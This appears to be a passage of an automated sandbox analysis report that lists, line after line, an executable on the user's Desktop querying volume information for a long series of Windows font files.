          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
